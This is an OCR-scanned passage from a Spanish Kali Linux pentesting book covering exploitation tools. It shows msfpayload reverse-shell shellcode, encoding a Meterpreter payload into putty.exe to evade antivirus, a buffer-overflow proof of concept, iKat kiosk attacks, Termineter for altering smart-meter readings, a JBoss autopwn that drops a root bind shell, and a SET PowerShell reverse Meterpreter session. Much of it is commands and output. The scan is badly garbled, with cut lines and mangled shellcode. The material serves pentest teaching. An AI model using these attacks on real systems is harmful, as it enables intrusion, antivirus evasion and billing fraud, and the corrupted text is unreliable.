Yl.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security 
x by Hernan Ochoa [hernanfaepliasecurity.con) 
^N Tor help. 


nist radortoracticasi-PC: 123000 
CTICASI- PCS WORKOROUP:1 23abc 


Imagen 04.23: Obtención de credenciales en texto plano. 


Proof Of Concept: Exploiting e ingeniería inversa 


En esta prueba de concepto se van a tratar temas de exploiting e ingeniería inversa, Es interesan 
conocer ciertas herramientas que pueden ayudar a ver este, (siempre dificil), tema. Metasploit, 
se ha mencionado, dispone de varias herramientas que ayudan a: 


- Entender el funcionamiento de los aplicativos, 
- Desensamblar binarios. 
- Analizar el código y posiciones de memoria. 


- Visualizar protecciones que puedan tener los binarios. 
- Estudiar el EIP y su offset. 


En primer lugar se hablará de ms/pay/oad, una de las herramientas estrella del framework. Con es 
herramienta de línea de comandos se puede generar código ejecutable personalizado, en di: int 
lenguajes como puede ser C, Perl, JavaScript o Ruby. La sintaxis de la herramienta es real 

intuitiva y sencilla, como se puede observar en la siguiente línea msfpayload [VARIABLES, LHOSI 
LPORT, PAYLOAD] <modo>. 


Los modos de ms/payload son: 
- Modo summary o S, presenta información sobre el payload que se quiere utilizar. 
- ModoC,R, J, P. Genera las shellcodes en lenguaje C, Ruby, JavaScript y Perl. 
- ElmodoR o raw. Permite obtener código en lenguaje máquina. 


- El modo X o ejecutable. Permite obtener un ejecutable de Windows con la shellcod 
empaquetada en el EXE. 


ет@КәТЇ:-# wefpayiced windows/shell reverse тєр  lhostz]82.168.8.45 їрогт абай C 


+ windows/shell reverse tcp -'314 bytes 
+ http://wew.netasploit com 
= VERBOSE=faLeo, LMOST=192.168,0,45, LPORT»4444, 
* RaverseComectRotrios=5, RaverweAllowProry«false, 
+ Prepandiigrate=false, EXITFUNC=process, 
* Initial AutoRunSeript=, AutoRunSeripte 
“ 
ioned char Бит} ros 
"ife rel x89 хб 00 88 x69 189 xS 31 x2 x64 Rb SZ 
ABD x5 2V8 ABON 2 Vi 4 8b 72328 OST eda 6 3D V f 
BL Nic rac e 1 vc G2 c 9 vic Lx PIB Vc 7 ez" 
OSI SB 52 x18 xo 2 occ x81 d o AO TB BS * 
"cO x74 da x91 SIB B w1 B db х58\х28\хВ! vidi aga 
NAAC t9 AB GA V x81 Nd i Vf P c8 vae cc fd" 
Хх VACATION 7S vif X83 97 dV F8 Gb V4 75 VxeZ S8 " 
ARO S8 24 481 ARABE Bb xc O BOU c XL Id xo" 
"XGA BOINA BI d£ x24 X24 So Sb x61 S Sa rS 1 +" 
red x58 AS USA Bb ALZA ABE Sd B 33 32 88 AO 
NOTVI3NG2VIS Руха Vx AC UI TAZAS BIN] 
i89 X89 ZINC A X54 x58 x68 29 X88 5b OO x Pads SONO 
BRASAS o4 58 x68 xoa VO Pod ore BN: 
BBC x89 2d 68 x82 x89 x1 1 Sc B9 AOS Ga LONAS 
S7 SB X99 xaS AVE T rcf f dS SB x63 xd x64 XO X9 ea 
S2 ST S7 x3 Vi f6vxSa x 2 459 ASE x2 v fd 86 vc 7 ld x24" 
c 1 V1 ABN AZ VL cS SO dA 4 x0 X56 S6 S6 
ASE 4e 56 86 53 96 88 79 acc ABE A f xS B8 
'xe8 cte ASS AE x f PONENS 387 1 dO V ff XS bb FB" 
[ADE a2 x56 AEB AE x95 abd Sd PAI i86 oe Vila BO 
IIS LAOS bo i47] 37372 6 Sa 90 S3 fads"; 


Imagen 04.24: Generación de una shellcode con msfpayload. 


do existe ung herramienta muy interesante como es msfencode, que permite ofuscar 
con el objétivo de evadir los AVs e TDS. La sintaxis es similar a ms/payload, y en 
herramientas que tienen que ver con shellcodes en Metasploit. En la imagen se puede 
un ejemplo, donde ms/payload genera una shellcode personalizada o customizada y se le 
el flujo de bytes para que éste los encode para lograr la evasión de los sistemas de 


79 asfpaylond windevs/aeterpreter/reverse icp Wost=192, 1881.39 1рог\=айёа R | astenco] 
-t exe -x /root/putty.exe -e x86/shikata ga nal -k -c 5 -o puttyCodificado, ere 
[*] X86/shikata ga nal succeeded with size 317 (iteration-l) 


^] x86/shikata ga nal succeeded with size 344 (iteration-2) 


Imagen (4.25: Generación de una shellcode y encodeada. 
+ 

п interesante y que junta las dos funcionalidades comentadas anteriormente es 
Una mejora que los usuarios no tienen en cuenta en la mayoría de las ocasiones es 
de los parámetros. Es más sencillo utilizar una herramienta cuyos parámetros tienen 
como por ejemplo el caso del parámetro —p. En esta herramienta se puede utilizar un 
semántico, es decir, --payload. De esta manera, el usuario puede entender fácilmente la 
dad que la herramienta presenta, 


т permite crear payloads para utilizar de forma independiente en los exploits que cualquier 


crear, o se puede utilizar para crear archivos ejecutables para sistemas operativos 
s, GNU/Linux и OSX. 


Pentesting con 


En la ruta /usr/share/metasploit-framework/tools se pueden encontrar herramientas utilizabl 
los procesos de ingeniería inversa y que pueden ayudar al usuario a averiguar información úl 
los binarios. A continuación se va a detallar un ejemplo con código en lenguaje C con el qu 
utilizarán distintas herramientas de Metasploit y de la propia distribución de Kali Linux. El cód 
es el siguiente: 


#include <stdlib.h> 
finclude <unistd.h> 
kinclude <stdio.h> 
#include <string.h> f 
void premio () 
t 
printf ("El flujo de código ha sido modificadoin"); 
} 
int main(int argc, char **argv 
{ 
char buffer[64]; 
gets (buffer); 
) 


El código anterior simplemente pide por teclado un valor, como se puede visualizar se dispone d 
buffer de 64 caracteres para almacenar en memoria. ¿Cómo se pueden modificar los valores i 
de la memoria para lograr que la función premio se ejecute? ¿Es posible? Conociendo la distri 
de la memoria, la respuesta es sí, 


Es importante fijarse en la instrucción void premio dya que la dirección de memoria don 
ubique deberá ser ejecutada en algún momento por el EIP, registro de siguiente instrucci 
ejecutar. En el flujo normal de la aplicación nunca se ejecutará dicha función, por ello habrá ‹ 

estudiar cómo conseguirlo. | 


Antes de buscar la dirección de memoria de la función premio, se puede obtener el valor del regi 
ВІР otorgando a la aplicación un valor de entrada más grande que la cantidad de caracteres 9 
soporta el buffer. Se ha elegido crear un patrón de 200 caracteres, y mediante el uso del debugge 
gdb se lanza la aplicación provocando el fallo y la obtención del valor del registro EIP. 


ооїикә!Ї:-# /usr/share/metasplolt-framowo 
GAa] Аа2аЗда4Аа5АабАа?АавАаЗАЬВАБІАБ2АБ: 


ding symbols from /root/poc 

КӨ) run 

Iterting program: /root/poc 
а1Аа2лаЗАа4Аа5Аабда7АаВАаЗАБВАЬ1 AUZAb3ADAADSADGAD7ADBADSAC BAC 1AC2ACIACAACSAC] 

TAcBAc GAdOAGI Аа2АСЗАСААСБАСБАС7АСВАЗЭАо8Ае: Аа 2де ЗАе4АаАобАе7АоВАеА OA? 1A е: 

| ЗАРАА !5А РБА 7A fBATAgOAG 1 Ag2Ag; 


«^no debugging symbols found)...done 


gram received signal SIGSEGV, Segeentation fault. 


Imagen 04.26: Obtención del valor del EIP. h 


Una vez que se dispone del valor del EIP y de un debug provocando la caída de la aplicación. 
debe obtener el offser del EIP. La dirección de retorno se podría pensar que está justamente despu 
del buffer de 64 caracteres, pero por lo general no es así, ya que se pueden encontrar bytes nulos 


tos antes de la dirección de retorno. Se utilizará la aplicación pattern. offset que proporciona 
loit tal y como se puede aprecian en la imagen. 


11:-# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x63413563 
t match at offset 76 


Imagen 04.27: Obtención del offset de caracteres. 


ez se ha obtenido que el valor es de 76 bytes de offset, se deberá buscar la dirección de memoria 
1e se pretende que la aplicación salte para modificar el flujo del programa. Con la aplicación 
p se puede obtener las direcciones de memoria donde empiezan las funciones tal y como se 


Э804В44с «premio»: 
с: 55 push %еһр 
89 е5 mov esp,tebp 
93 ес 18 sub $0x18,%osp 
c7 04 24 10 B5 04 88 movi $9х8948510,(%әѕр) 
98 42 fo ff tf call 8048338 eputsQpit» 


c9 


Imagen 04.28: Obtención de la dirección de memoria de premio. 


jue se dispone de la dirección de memoria donde se encuentra la función premio, la cual es 
4c, se puede generar la entrada maliciosa que busca modificar la ejecución de la aplicación. 
rada serán 76 caracteres de bytes no importantes que irán sobreescribiendo la memoria de la 
partir del byte 77 comienza la dirección de retorno que ejecutará el EIP. En esta posición se 
Itroducir la dirección de memoria 0x0804844c, en formato little endian. 


[гоотакэ11:-# perl е "print 78776 . "Ax4c VXBAVXO4 x88 ^ 
flujo de codigo ha sido modificado 


E 


Imagen 04.29: Ejecución de entrada maliciosa con el fin de cambiar el flujo del programa. 


h nienta muy interesante para debuggear ejecutables y librerías (DLLs) de sistemas 
lows es Ollydbg. Esta herramienta se encuentra disponible en la distribución Kali Linux a través 
ine.En la imagen se puede visualizar Ollydbg corriendo en Kali Linux. 


[fixne:font:freetype SelectFont Untranslated charset 255 
` OllyDbg 


Pentesting con 


Otra herramienta del framework de Metasploit es msfpescan conta que se puede analizar infor 
del ejecutable y buscar instrucciones y en qué direcciones se encuentran. Gracias a la het 
puede recopilar información como: 


- DLLCharacteristics. 

- Funciones importadas. 

- Cabeceras y sus opciones. 

- Direcciones virtuales del código y datos. 


En la imagen se puede visualizar la ejecución de la instrucción msfpescan i «nombre ejecute 
para obtener la información de éste. Otra instrucción interesante es la de buscar instrucck 
salto a ciertos registros con el parámetro j. 


DU Characteristics 


[Imported Functions 


DVAPI32.dli ӨхӨ841987с 621 RegQueryValueExA 
DVAPI32.dli Gx8041d094 588 penThreadTokan 


Imagen 04.31: Información de ejecutable obtenida con msfpescan. 


Network Exploitation 


El apartado de Network Exploitation que se puede encontrar en Aplicaciones - > Kali Linux. 
Herramientas de Explotación proporciona una serie de herramientas de explotación de d 
ámbito: 
- Herramienta para testear equipos con direccionamiento IPv6. 
- Herramienta para testear el servidor de aplicaciones JBoss. 


- Herramienta para testear entornos restringidos como terminales Citrix, WebTVs, 
otros. 


- Herramienta para testear el acceso a medidores de luz. Este tipo de herramienta llam 
mucho, la atención de los hackers, ya que se puede poner a prueba en el mundo real. 


tulo IV. Explotación 


ploitó ` 

herramienta permite al pentester realizar una serie de comprobaciones en entornos donde 
lireccionamiento IPv6 se encuentra habilitado. Hay que recordar que por defecto los sistemas 
os modernos de Microsoft Windows, los Ubuntu, el propio Kali Linux, disponen de este tipo 
cionamiento por defecto. 


de explicar la sintaxis de la herramienta se especifica donde se puede encontrar la dirección 
еп una adaptador en Kali Linux. Mediante la ejecución del comando ifconfig se obtiene la 
sión correspondiente a las interfaces de red que existen en el equipo. 


rootgkali:-f ifconfig 
eth Link encap:Ethernet HWaddr Be:lf 

inet addr:192.168.0.57 Вс; 92.168.0.255 Mask:255.255.255.8 
inet6 addr: feB8::a08:27ff:fef4:Belf/64 Scope:Link 


Imagen 04.32: Obtención de la dirección IPv6 en Kali Linux. 


erramienta exploitó se encarga de realizar el siguiente tipo de pruebas a un farger соп 
ionamiento IPv6, conectividad, checksums, comprobación de las vulnerabilidades CVE-2003- 
9 bad prefix lenght, CVE-2004-0257 como se puede visualizar en la imagen. 


exploite ethó теб® 
vulnerability checks on fi 
orma pingé 

VE-NONE overlarge ping, 6 checksum combinations 
: checksums for packets > 65535 are unreliable due implementation diffe 
rget platforms 

VE-NONE large ping, 3 checksum combinations 

ecksums for packets > 65535 are unreliable due implementation diffe 
сев on target platforms 

est 3: CVE-2003-9429 bad prefix length (little information, implementation ш 


оот@КаТТ: 
Performing 
Har T 


ast 4: CVE-2004-0257 ping, send toobig on reply, then SYN pkt 
ing PASSED әрі, 


est 5: normal till alive?) we got s 
Imagen 04.33: Comprobación sobre un target con ехр!ойб. 


t 

(at, The Interactive Kiosk Attack Tool, es una magnífica herramienta para realizar pentesting 
tornos restringidos como pueden ser los terminales Citrix, Kioskos de servicios de acceso a 
llernet, directorios en aeropuertos, máquinas de impresión, las WebTVs, etcétera. La herramienta 
desarrollada por Paul Craig. 


ta herramienta está basada en una gran idea, a la vez que sencilla, permite a los usuarios de 
5 Kiosk navegar desde éstos hasta un servidor configurado el cual proporcionará ciertas acciones 
explotar el Kiosk. Un ejemplo rápido y sencillo, un usuario llega a una máquina donde puede 
ciertas páginas de Internet. El usuario tiene configurado en una dirección IP un servidor que 
Foporciona ¡Kar el cual al acceder permite realizar desde dicho navegador una serie de acciones con 
fin de saltarse la seguridad del Kiosk. Actualmente, se pueden encontrar versiones рага Windows, 
х y una versión denominada PhotoKAT implementada para explotar sistemas que permitan 
ar un dispositivo USB. 


Pentesting соп | 


La implementación de esta herramienta está basada en un modelo cliente-servidor en el q 
payload que se cargan en el kiosk podrán realizar una conexión inversa hacia el servidor Каб 
esta manera realizar la fase de post-explotación. La utilización del protocolo SMB para cai 
agente ¡kat.exe en el kiosk también es muy interesante. 


Además, la integración con Metasploit Browser Autopwn y las nuevas técnicas permiten una. 
variedad de test que realizar sobre los kiosk. 


/ 
Proof Of Concept: Vigilando el kiosk con ¡Kat 
En esta prueba de concepto se propone el siguiente escenario: 


- Puesto o Kiosk en un museo donde los visitantes pueden consultar información a tri 
de la navegación web. 
- Un atacante ha preparado el servicio de ¡Kat que incorpora la distribución Kali Lim x. 
- El atacante se enfrenta al Kiosk, el cual dispone de Windows XP por lo que p 
aparentemente. 


En primer lugar el atacante configura el servicio mediante la ejecución del comando iKar, Ca 
destacar que tras la ejecución del comando se abrirá una ventana en un entorno gráfico b 
donde se puede configurar las interfaces de red, por dónde ¡Kat recibirá las peticiones. Este het 
es importante, ya que la interfaz debe disponer de conectividad con Internet, para que cuandé 
atacante se conecte desde el Kiosk, éste pueda llegar hasta el servicio. Como es bien sabido, si 
se configura en un entorno casero o laboral básico se deberá abrir un puerto del router para co 
que desde el Kiosk se tenga conectividad con el servicio. 


|rootgkali:/usr/sharef ikat 


v2013 - Desktop Edition 
Developed by tha "King of Kiosk Hacking" 


[+] Loading iKAT For Linux 
[+] Found network interface: 192.168.0.59 


Imagen 04.34: Ejecución de iKat. Imagen 04.35: Configuración de tarjeta de red para iKi 


Una vez que el pentester se encuentra en el Kiosk, éste se conecta al servicio y puede visualizar U 
sitio web como el que se puede ver en la imagen. Una breve descripción indica el objetivo de 
y cuáles son sus funcionalidades. El logo del sitio web puede llamar bastante la atención, sobre to 
al género masculino. 


¡Capítulo IV. Explotación 


Тч 


Available Versions 


Imagen 04.36: Navegación desde el Kiosk al sitio web ¡Kar malicioso del atacante 


Sitio web dispone de un listado de opciones muy interesantes. En cada versión ¡Kar aumenta 
lonalidades otorgando al pente: 
mos. Hay que recordar que este tipo de entornos no suelen estar actualizados, aunque cada día 
responsables de los Kiosk están más al tanto de asegurar los mismos. 


'er un surtido de pruebas para verificar la seguridad de dichos 


Auto Exploltatlon — econnalssance — 
automati Expotation of any browser Too for омет 


based erwroment уол target 


File System Links — Common Dialogs— 


Access the юса flesystem to геев! юпа 


useful Mes and ағесіопе 


URI Handlers File Handlers — 


tor oter numerate at regsterea Fse Haner 
target. апо spun tne nancing appicat 


Browser Addons FireFox Resources 


Browser plugins ana adaons to ad jx эмет rreman atout 
ром attempt "pet 


IKAT Tools— Crash a Klosk— 


A compete атоо toos des aem 


Imagen 04.37: Listado de opciones de ¡Kar para realizar en el sistema. 


Pentesting соп Ка 


A continuación se muestra una tabla con el listado de opciones principales que proporciona 


Opciones Descripción 


Lanzamiento de un conjunto de exploits para aprovecharse 
te del navegador det Kiosk. 


AutoExploitation 


Recon navegador, versiones, todo lo relacionado con el target. 
* ? Acceso al sistema de archivos del Kiosk, pudiendo examinar archivos. 
File System Links Унос privados: 
URI Handlers Herramientas para determinar información acerca del arget. 
Conjunto de herramientas, con los que se pueden descargar ejecutabli 
¡Kat Tools y lanzarlos. El objetivo de esta acción es conseguir ejecutar un payload 


que pueda interesar al pentester. 


Crash a Kiosk Ejecución maliciosa con el fin de denegar el servicio del Kiosk. 
Tabla 04.02: Opciones principales de ¿Kar y descripción: 


pz //182,169,0,59:6092/sEwf јән) 


started, 
Starting handler for windovs/seterpreter/reverse tcp on port 6082 
Starting handler for vindovs/weterpreter reverse tcp on port 6085 
Started reverse handler on 132,168,0,59:5082 
Starting the payload handler. 
Starting handler for Java/eterpreter/reverse tcp on port 6081 
Started reverse handler on 192, 168,0.59:6005 


Starting the payload handler. 


— Ione, found 49 exploit modules 
Using URL: httpz//192,188,0,59: 02/autopun. 
Server started, 


Imagen 04.38: Consola que muestra la interacción entre ¡Kar y msfconsole para browser_autopw. 


Antes de seguir hay que hacer hincapié еп la configuración automática en el servicio ¡Kar de lt 
técnica Browser Autopwn de Metasploit. Automáticamente, al arrancar ¡Kat configura los módi 
necesarios que quedan a la espera de recibir conexiones por parte del Kiosk. Esta acción р! 
provocar que el pentester encuentre una vía de interacción con el entorno con pri 


Uno de los ejemplos llamativos es cuando el pentester utiliza la opción File System Links p 
acceder a los recursos de red, al sistema de archivos, panel de control, etcétera. Se puede visualiz 
en la imagen como el servicio proporciona los links necesarios para pegándolos en la barra 
direcciones acceder a los recursos. Para pegarlos se necesitará disponer del teclado en pantalla, 

más adelante se verá cómo conseguirlo. 


IV. Explotación 


Shell Handler Links 


A jet Of Shes телен ОЯ, өз each URI i unable fo De accessed from tne 
жете zore, уси wii need to ссруразіе eau URI ito the edoress bar 


The Коконд URLS shout ге entered ric your browsers URL entry bar Dy hana. 
тта тео v олу work f you пане URL entry bar 


Imagen 04.40: Copiar y pegar la instrucción en el navegador se obtiene acceso a Mi PC. 


'opciones interesantes que el pentester puede llevar a cabo es la recogida de información 
En la imagen se puede visualizar qué tecnologías se encuentran habilitadas en el 
г, las variables de éste, las variables globales, etcétera. Esta opción es muy importante a la 
осег el entorno que se está auditando. 


Mum n msn e o nmi 


hr Hin 
Imagen 04.41: Recogida de información en el Kiosk. 


EJ Pentesting con 


archivos y ejecutarlos, con lo que la ejecución de shellcodes sería un éxito. Por otro lado, se p 
pretender ejecutar ciertas aplicaciones o recursos interesantes como puede ser una cmd. 


IKAT Tools * 
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Imagen 04.42. 
en pantalla 
Б Eni б 
Imagen 04.43: Obtención de elementos tras la ejecución del payload. 
Termineter 


Termineter es un framework de código libre el cual se encuentra codificado en Python y p 
cualquier usuario conectarse a los medidores digitales de electricidad o Smart Meter (medidor 
inteligentes) que están instalados en los hogares por las compañías de electricidad. Estos medi 
permiten a las compañías revisar el consumo eléctrico de manera remota, sin necesidad de que: 
empleado acuda al lugar donde se encuentran los contadores. 


Termineter se puede utilizar para modificar el software del contador o medidor, y reducir, por ejen 
las tarifas que los usuarios pagan por la electricidad. También, sencillamente, se podría ord 
contador que informe que ha habido menos consumo. La aplicación fue liberada a mediados en 20 
y es toda una revolución en la explotación de este tipo de aparatos. La aplicación se сопесїагїй` 
medidor o Smart Meter a través de una interfaz. 


o IV. Explotación 


menta los protocolos de comunicación C12.18 y C12.19 y actualmente soporta los medidores 
la C12.19 con juegos de caracteres de 7 bits. Termineter comunica con medidores 
ntes а través de una sonda de tipo ANSI-2 optical con una interfaz serie. 


в es muy similar a la de la línea de comandos de Metasploit, aunque Termineter no se 
ntra integrado, a día de hoy, con el framework de Metasploit. 


ermineter > use 

rute force login get info get security info set meter id 
get log info read table Set meter mode! 

Un tables get modem info ^ run procedure write table 

ermineter > use read table 

ernineter ( ) > info 


Name: read table 
Author: Spencer McIntyre <sncintyregsecurestate.net> 
Version: 1 


iic Options: 
Кате 


TABLEID table to read from 


lows individual tables to be reed from the 


Imagen 04.44: Módulos disponibles en termineter y sintaxis del framework. 


leer tablas y modificarlas? La respuesta es sí, siempre y cuando se pueda acceder a las 
información sin embargo estaría en modo crudo y sin analizar. En líneas generales, el 
0 es muy interesante y con un futuro importante enfocado a la seguridad de los medidores 


'ermineter ( ) » back 
'ermineter > help 


ype help «command» For Information 


ist Of Available Commands 


exit info logging resource set 
help ipy reload run show 


Imagen 04.45: Ayuda de rermineter. 


į 


¡enta es otra de las que se encuentran en el pack de herramientas de explotación en Kali 
pone de versiones para atacar a servidores Windows y Linux. La herramienta se puede 
еп la ruta /usr/share/jboss-autopwn donde se incluyen de los scripts necesarios para llevar 
testing de los servidores JBoss. 


script que se puede encontrar en el directorio comentado anteriormente. Su sintaxis es 
gel> «port». Нау que recalcar que el script е.5 es para sistemas «МІХ, mientras que el 
е5 para sistemas Windows. 


A continuación se muestra un ejemplo de ejecución sobre un sistema Linux: 


[rootékali jboss]f ./e.sh 192.168.1.2 8080 2»/dev/null 
[x] Retrieving cookie 

[x] Now creating BSH script... 

[х] .war file created successfully in /tmp 

[x] Now deploying .war file: 
http://192.168.1.2:8080/browser/browser/browser.jsp 

[x] Running as user...: 

uid=0 (root) gide0(root) groups=0(root),1 (bin) ,2 (daemon) ,3(sys) + 4 (adm), 6 (di 
heel) A 

[x] Server uname... : 

Linux kali Х.Х.Х. 
[!] Would you like to upload a reverse ог a bind shell? bind 

[!] On which port would you like the bindshell to listen on? 31337 
[x] Uploading bind shell payload.. 

[x] Verifying if upload was successful... 

-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload 

[x] You should have a bind shell on 192.168.1.2:31337.. 

[x] Dropping you into a shell. 
Connection to 192.168.1.2 31337 port [tcp/*] succeeded! 
id 

uid=0 (root) gid=0(root) groups-0(root),1(bin),2(daemon),3(sys), 4 (adm) , 6 (disk) і 
heel) " 
Python -c "import pty; pty.spawn("/bin/bash")' 
[rootükali /]& full interactive shell :-) 


SE Toolkit 


La ingeniería social viene representada en Kali Linux gracias al script SET, Social Engineer 
Hay que recordar que la ingeniería social es la vía por el que un atacante manipula el mundo 
le presenta a un usuario, para que éste piense que dicho mundo es legítimo. De esta forma el 
pretende recolectar información sensible de la víctima, como pueden ser las credenciales, 
realizar escalada de privilegios, etcétera. 


El principio de la ingeniería social es que la parte más débil de todo sistema es el usuario, es p 
que concienciar a éstos debe ser una de las prioridades de toda empresa. Los medios que el in 
social utiliza, generalmente, son el teléfono e Internet. En cierto tipo de auditorías también: 
ser válido hacerse pasar por otros compañeros de trabajo, con el objetivo de sacar el máxin 
información. E 


SET es un aplicativo o script escrito en lenguaje Python, se encuentra alojado en la siguiente ubic 
/user/share/set. Aunque se puede invocar desde cualquier ruta уа que se-toolkit se encuent 
variable $PATH. SET proporciona un entorno sencillo de utilizar para preparar todo tipo de 
de ingeniería social, e incluso automatización del framework. Se integra con Metasploit [ 
le proporciona un gran potencial y flexibilidad en el momento de preparar los distintos al 
Además, también se integra a Fast-Track como kit de automatización para procesos de explot 
con Metasploit. 


ТУ. Explotación 


o de configuración de SET se encuentra en la ruta /us»/share/set/config y se denomina 
Existen directivas en el fichero de configuración de SET muy interesantes, algunas de 
an a continuación: 


DNSSPOOF. Es interesante estudiar esta técnica para realizar un phishing controlado por 
Л atacante en todo instante. Esta directiva indica qué herramienta realizará la técnica de DNS 
Spoofing. 

ACCESS POINT SSID. Indica qué nombre recibirá el punto de acceso falseado con SET. 
interesante para ataques de suplantación de AP o puntos de acceso, en los típicos ataques 
de ingeniería social a redes Wireless. 

- METASPLOIT IFRAME PORT. Indica el puerto utilizado para realizar un ataque de 
frame injection usando la técnica de Browser Autopwn. 

METERPRETER MULTI COMMANDS. Establece qué comandos se quieren ejecutar 
ando una sesión de Meterpreter es conseguida. 
< AUTO_MIGRATE. Si esta variable se encuentra activa, cuando se realice la explotación, 
|payload migrará automáticamente a otro proceso. 

ЛОТО DETECT. Viene activada por defecto y proporciona la posibilidad de configurar 
omáticamente la dirección IP que se asignará a los servidores web. 


s de ataque 

rentes vectores de ataque proporcionados por SET. Cada evolución de la herramienta 
evos vectores de ataque interesantes. En la versión que viene con Kali Linux se pueden 
los siguientes vectores para ingeniería social: 


'Spear-Phishing Attack Vectors. Este vector de ataque automatiza el proceso de envío 

с s electrónicos, tanto vía Sendmail como Gmail, que llevan adjuntos archivos 
10508, los cuales contienen algún tipo de exploit. 

ite Attack Vectors. Este vector permite realizar copias de sitios web o utilizar 

de éstos con el objetivo de presentar un mundo falso a la víctima, lo más real 

+ Los clásicos ataques de Java, Credential Harvester Attack o Tabnabbing son las 

5ірпіаѕ de este vector de ataque. 

ectious Media Generator. Este vector;de ataque es uno de los más simples y más 

05, siempre y Cuando se tenga contacto físico con la víctima. La idea es generar un 

соп un fichero de autorun, los cuales se deben instalar en un dispositivo externo 

un pendrive o CD/DVD. 

ие а Payload and Listener. Permite generar ejecutables con payloads y configurar 

er. 

Mailer Attack. Este vector permite realizar envíos de correos electrónicos, ya sean 

оз о dirigidos. - 

duino-Based Attack Vector. Permite realizar ataques a los Arduino. Un vector interesante 

y que puede llamar mucho la atención del pentester principiante. 


Pentesting соп | 


- SMS Spoofing Attack Vector. Permite spoofear el emisor de un mensaje SMS. Ci 
la víctima reciba el SMS aparece como emisor otro número distinto al original, con est 
pueden realizar ataques vía SMS. 
- Wireless Access Point Attack Vector. Este vector de ataque permite crear un рш 
acceso falso, el cual simulará una red. Además, proporcionará DHCP y DNS, 
manipulados para monitorizar y gestionar el enrutamiento de la víctima que se conec 
punto de acceso. { 1 
- QRCode Generator Attack Vector. El vector de ataque para generación de QRC 
permite al usuario crear este tipo de imágenes que pueden ser leídas e interpretadas | 
aplicaciones móviles. El objetivo es claro, conseguir que el usuario del dispositivo m 
acceda a un sitio web manipulado por el atacante, o incluso conseguir que éste ejecute. 
a través del ORCode. 

- PowerShell Attack Vectors. Este vector de ataque que proporciona SET permite al usi 
crear pequeños scripts que serán ejecutados en una máquina víctima con el objeti 
obtener una sesión inversa o directa. Estos scripts son utilizados por PowerShell, lo € 
bastante interesante. 


Proof Of Concept: PowerShell y la puerta de atrás 

En esta prueba de concepto se propone el uso de PowerShell para obtener una sesión de Mei 
La idea es que el pentesrer dispone de acceso fisico a un equipo que se está auditando, y 
para intentar elevar privilegios es obtener una sesión de Meterpreter y después probar con dis 
exploits para elevar los privilegios. El script que se debe ejecutar en una sesión de Po 
es generado por SET como se verá a continuación. Hay que recalcar que por defecto Po 
no ejecuta scripts, ni locales ni generados en otras máquinas, por lo que se deberán eji 
instrucciones pegándolas directamente en la línea de comandos. Para ejecutar SET se puede uti 
el comando se-toolkit en una línea de comandos de Kali Linux o ejecutar el script set que se епо 
en la ruta /usr/share/set. 


Join us en ire. freenode.net in channel $setoolkit 


The Socíal-Engineer Toolkit is a product of TrustedSec 


Visit: їрє: hee t 
Select from the тели: 


1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
SMS Spoofing Attack Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 
Third Party Modules 


Return back to the main menu. 


Imagen 04.46: Elección de PowerShell en SET. 


pitulo IV. Explotación 


nú de SET presenta los distintos vectores de ataque que se pueden configurar a través de la 
cación. Para presentar esta prueba de concepto se utilizará el vector de ataque de PowerShell 
ide se deberá escoger la opción nümero 1, la del injector. Esta opción generará en la ruta /usr/ 

v/set/reports un archivo de texto con el código encodeado y preparado para ser ejecutado en la 
Shell. 


1) Powershell Alphanumeric Shellcode Injector 
2) Powershell Reverse Shell 
3) Powershell Bind Shell 


4) Powershell Dump SAM Database 


99) Return to Main Menu 
Imagen 04.47: Elección de injector en PowerShell. 


selección del método de injector para PowerShell se debe configurar a qué dirección IP 
á la shellcode que va insertada en el script. Además, se pregunta al usuario si quiere 
el listener o handler para la recibir la conexión. Hay que recalcar que si se elige "no", se 
e configurar después mediante el módulo de Metasploit exploit/multi/handler. 


7 >l 
ii» IP address for the payload listener: 192.168.0.57 

|*] Prepping the payload for delivery and injecting alphanumeric shellcode... 
Mer the port number for the reverse (443]: 4444 

] Generating x64-based powershell injection code. 

] Generating xB6-based powershell injection codo... 

] Finished generating powershell injection bypass. 

] Encoded to bypass exececution restriction policy... 

} If you want the powershell commands and attack, they are exported to report 

powarshell/ 


art the listener now [yes/no]: : yes 
Й: x64]:x861» Select x86 or x64 victim machine [defau 


Imagen 04.48: Configuración del payload y el handler. 


ación se muestra el aspecto que tiene el código generado por SET y almacenado en el 
ro de texto en el directorio reports. Lo interesante de este código es que se puede pegar la 
ción en una ventana de PowerShell y aunque la política de ejecución de scripts sea de tipo 
l, es decir no se ejecuta ningún tipo de scripts en la PowerShell, al ser una instrucción ésta 


Imagen 04.49: Aspecto de la instrucción de PowerShell. 


imo hay que visualizar como se recoge la sesión de Meterpreter gracias al handler previamente | 


[+1 Processing reports/powershell/powershell.rc for ERB directives. 
resource (reports/powershell/powershell.rc)» use multi/handler 
resource (reports/powershell/powershell.rc)» set payload windows/meterpreter/re 
rse tcp 

payload => windows/meterpreter/reverse tcp 

resource (reports/powershell/powershell. "i set lport 4444 


exploit(handler) > 
] Started reverse handler on 

] Starting the payload handler. 
1 

1 


Sending stage (752128 bytes) to 192.168.0.58 
Meterpreter session 1 opened (192.168.0.57:4444 -> 192.168.0.58:49263) at 
03-26 13:40:12 «8180 


Imagen 04.50: Sesión de Meterpreter inverso a través de PowerShell 
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Capítulo V 
Auditoría de aplicaciones web 


Introducción a las vulnerabilidades web 


tudio realizado en este capítulo, tiene como objetivo identificar y explotar las vulnerabilidades 
usuales en aplicaciones web. La idea final es ayudar a los auditores, a dirigir un plan de 

idad que permita proveer de los conceptos necesarios, para llevar a cabo una auditoría desde 
amientas incluidas en la distribución Kali Linux. 


ia recolección de información, mostrada en este libro dentro del segundo capítulo, será una 
tión clave llegados a este punto de la auditoría, debido a que un Foorprinting y Fingerprinting 
llos, pueden llegar a dar unas grandes probabilidades de éxito, De esta forma se dará lugar, al 
ento de detección de vectores ofensivos más frecuentes, para la futura realización de ataques 


d informática, apuntan a que vulnerabilidades de Cross Site Scripting, seguidas de las de 
Injection, abordan la mayor parte de ataques en la web. Esto incrementaría la importancia de 
nplementación de herramientas Web Aplication Firewall (WAF), de cara a los servicios web. 


ente un servidor, sin este tipo de protecciones y sin una previa auditoría de código, estaría 
o a sufrir este tipo de ataques con grandes facilidades en cuanto a lo que su explotación se 
